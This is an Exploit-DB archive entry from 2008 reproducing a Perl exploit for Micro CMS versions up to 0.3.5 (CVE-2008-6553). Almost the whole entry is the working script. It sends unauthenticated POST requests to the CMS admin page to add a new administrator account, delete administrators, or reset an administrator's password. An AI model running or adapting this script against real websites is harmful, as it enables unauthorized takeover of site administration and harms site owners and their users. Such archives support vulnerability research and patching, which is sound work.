Micro CMS <= 0.3.5 - Remote Add/Delete/Password Change Exploit

2008-11-01T00:00:00
ID EDB-ID:6933
Type exploitdb
Reporter StAkeR
Modified 2008-11-01T00:00:00

Description

Micro CMS <= 0.3.5 Remote (Add/Delete/Password Change) Exploit. CVE-2008-6553. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl
# --------------------------------------------------------------
# Micro CMS &lt;= 0.3.5 Remote (Add/Delete/Password Change) Exploit
# StAkeR[at]hotmail[dot]it
# http://www.impliedbydesign.com/apps/microcms/microcms.zip
# --------------------------------------------------------------

use strict;
use LWP::UserAgent;

my ($admin,$passwd);
my @real = undef;
my $http = new LWP::UserAgent; 
my ($host,$path,$tell) = @ARGV;

if($host !~ /http:\/\/(.+?)$/i || $tell !~ /^\-(delete|change|add)?$/i)
{
  print STDOUT "[+] Micro CMS &lt;= 0.3.5 Remote (Add/Delete/Password Change) Exploit\n";
  print STDOUT "[+] Usage: perl $0 http://[host] [path] -option (-delete,-change,-add)\n";
  exit;
}


if($tell =~ /delete/i)
{
  print STDOUT "[+]Admin ID: ";
  chomp($admin = &lt;STDIN&gt;);
  
  if(defined $admin)
  {
    print STDOUT del_admin($admin);
    exit;
  }
  else
  {
    print STDOUT "[+] Not Defined!\n";
    exit;
  }
}

if($tell =~ /change/i)
{
  print STDOUT "[+] Admin ID : ";
  chomp($admin = &lt;STDIN&gt;);
  
  print STDOUT "[+] New Password: ";
  chomp($passwd = &lt;STDIN&gt;);
  
  if(defined $admin || defined($passwd))
  {
    print STDOUT change_pwd($admin,$passwd);
  }
  else
  {
    print STDOUT "[+] Not Defined!\n";
  }
}

if($tell =~ /add/i)
{
  print STDOUT "[+] Admin Username: ";
  chomp($admin = &lt;STDIN&gt;);
  
  print STDOUT "[+] Admin Password: ";
  chomp($passwd = &lt;STDIN&gt;);
  
  if(defined $admin || defined($passwd))
  {
    print STDOUT add_admin($admin,$passwd);
  }
  else
  {
    print STDOUT "[+] Not Defined!\n";
  }
}


sub change_pwd
{
  my ($userid,$passwd) = @_;
 
  my $post = {
               action                  =&gt; 'change_password',
               administrators_id       =&gt; $userid,
               administrators_password =&gt; $passwd,
            };
          
  $http-&gt;post($host.'/'.$path.'/microcms-admin-home.php',$post);
   
  return "[+] Password Changed! ($passwd)\n";

}


sub del_admin
{
  my $userid = shift @_;
 
  my $post = {
               action                  =&gt; 'delete_admin',
               administrators_id       =&gt; $userid,
            };
          
  $http-&gt;post($host.'/'.$path.'/microcms-admin-home.php',$post);
   
  return "[+] Admin ($userid) Has Been Deleted!\n";

}


sub add_admin
{
  my ($username,$password) = @_;
  my $level = 1;
 
  my $post = {
               action                  =&gt; 'add_admin',
               administrators_name     =&gt; $username,
               administrators_username =&gt; $username,
               administrators_password =&gt; $password,
               administrators_email    =&gt; $username,
               administrators_level    =&gt; $level,
            };
          
  $http-&gt;post($host.'/'.$path.'/microcms-admin-home.php',$post);
   
  return "[+] Username: $username and Password: $password\n";
}    

# milw0rm.com [2008-11-01]